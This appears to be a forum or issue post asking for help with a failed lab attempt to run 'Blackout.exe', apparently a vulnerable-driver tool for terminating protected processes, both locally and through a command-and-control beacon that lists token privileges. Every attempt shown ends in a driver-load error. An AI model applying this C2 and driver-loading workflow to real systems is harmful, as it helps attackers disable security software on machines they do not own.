I'm currently unable to perform the explained technique in my own lab.
c:\Users\admin\Desktop>tasklist | findstr notepad.exe
notepad.exe 2416 RDP-Tcp#1 2 17,364 K
c:\Users\admin\Desktop>whoami /priv
c:\Users\admin\Desktop>Blackout.exe -p 2416
driver path: c:\Users\admin\Desktop\Blackout.sys
Loading Blackout.sys driver ..
Service already exists.
faild to load driver ,try to run the program as administrator!!
c:\Users\admin\Desktop>
[10/19 08:52:40] beacon> shell whoami /priv
[10/19 08:52:40] [*] Tasked beacon to run: whoami /priv
[10/19 08:53:04] [+] host called home, sent: 43 bytes
[10/19 08:53:04] [+] received output:
Privilege Name Description State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
[10/19 08:56:50] beacon> run c:\temp\Blackout.exe -p 2416
[10/19 08:56:50] [*] Tasked beacon to run: c:\temp\Blackout.exe -p 2416
[10/19 08:57:21] [+] host called home, sent: 46 bytes
[10/19 08:57:21] [+] received output:
driver path: C:\Windows\system32\Blackout.sys
Loading Blackout.sys driver ..
Service already exists.
faild to load driver ,try to run the program as administrator!!
Any insight would be delightful.